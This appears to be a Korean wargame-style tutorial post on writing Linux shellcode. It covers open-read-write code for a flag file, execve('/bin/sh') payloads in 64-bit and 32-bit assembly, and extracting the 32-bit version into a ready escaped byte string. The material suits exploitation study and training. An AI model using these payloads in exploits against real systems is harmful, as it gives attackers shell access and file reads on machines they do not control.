Shellcode 만들기
작성자 정보
- za9uar 작성
- 작성일
본문
1. Open, Read, Write
| Skeleton Code |
// File name: sh-skeleton.c // Compile Option: gcc -o sh-skeleton sh-skeleton.c -masm=intel
__asm__( ".global run_sh\n" "run_sh:\n" "Input your shellcode here.\n" "Each line of your shellcode should be\n" "seperated by '\n'\n" "xor rdi, rdi # rdi = 0\n" "mov rax, 0x3c # rax = sys_exit\n" "syscall # exit(0)");
void run_sh();
int main() { run_sh(); } |
| orw.c (open,read,write 작성 예시) |
// File name: orw.c // Compile: gcc -o orw orw.c -masm=intel
__asm__( ".global run_sh\n" "run_sh:\n" "push 0x67\n" "mov rax, 0x616c662f706d742f \n" "push rax\n" "mov rdi, rsp # rdi = '/tmp/flag'\n" "xor rsi, rsi # rsi = 0 ; RD_ONLY\n" "xor rdx, rdx # rdx = 0\n" "mov rax, 2 # rax = 2 ; syscall_open\n" "syscall # open('/tmp/flag', RD_ONLY, NULL)\n" "\n" "mov rdi, rax # rdi = fd\n" "mov rsi, rsp\n" "sub rsi, 0x30 # rsi = rsp-0x30 ; buf\n" "mov rdx, 0x30 # rdx = 0x30 ; len\n" "mov rax, 0x0 # rax = 0 ; syscall_read\n" "syscall # read(fd, buf, 0x30)\n" "\n" "mov rdi, 1 # rdi = 1 ; fd = stdout\n" "mov rax, 0x1 # rax = 1 ; syscall_write\n" "syscall # write(fd, buf, 0x30)\n" "\n" "xor rdi, rdi # rdi = 0\n" "mov rax, 0x3c # rax = sys_exit\n" "syscall # exit(0)");
void run_sh();
int main() { run_sh(); } |
// 테스트 파일 생성
/tmp/flag
// 실행
# ./orw
flagggg
----------------------------------
2. execve("/bin/sh", null, null)
| Skeleton Code |
;Name: execve.S
mov rax, 0x68732f6e69622f push rax mov rdi, rsp ; rdi = "/bin/sh\x00" xor rsi, rsi ; rsi = NULL xor rdx, rdx ; rdx = NULL mov rax, 0x3b ; rax = sys_execve syscall ; execve("/bin/sh", null, null) |
| 셸코드 예제 |
// File name: execve.c // Compile Option: gcc -o execve execve.c -masm=intel __asm__( ".global run_sh\n" "run_sh:\n" "mov rax, 0x68732f6e69622f\n" "push rax\n" "mov rdi, rsp # rdi = '/bin/sh'\n" "xor rsi, rsi # rsi = NULL\n" "xor rdx, rdx # rdx = NULL\n" "mov rax, 0x3b # rax = sys_execve\n" "syscall # execve('/bin/sh', null, null)\n" "xor rdi, rdi # rdi = 0\n" "mov rax, 0x3c # rax = sys_exit\n" "syscall # exit(0)");
void run_sh();
int main() { run_sh(); } |
bash$ gcc -o execve execve.c -masm=intel
bash$ ./execve
sh$ id
uid=1000(dreamhack) gid=1000(dreamhack) groups=1000(dreamhack)
----------------------------------
3. shellcode 추출
1) asm 코드 생성
| shellcode.asm |
; File name: shellcode.asm section .text global _start _start: xor eax, eax push eax push 0x68732f2f push 0x6e69622f mov ebx, esp xor ecx, ecx xor edx, edx mov al, 0xb int 0x80 |
2)
$ sudo apt-get install nasm
$ nasm -f elf shellcode.asm
$ objdump -d shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: 68 2f 2f 73 68 push $0x68732f2f
8: 68 2f 62 69 6e push $0x6e69622f
d: 89 e3 mov %esp,%ebx
f: 31 c9 xor %ecx,%ecx
11: 31 d2 xor %edx,%edx
13: b0 0b mov $0xb,%al
15: cd 80 int $0x80
3)
$ objcopy --dump-section .text=shellcode.bin shellcode.o
$ xxd shellcode.bin
00000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e331 1.Ph//shh/bin..1
00000010: c931 d2b0 0bcd 80 .1.....
4)
# execve /bin/sh shellcode:
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"
관련자료
-
이전
-
다음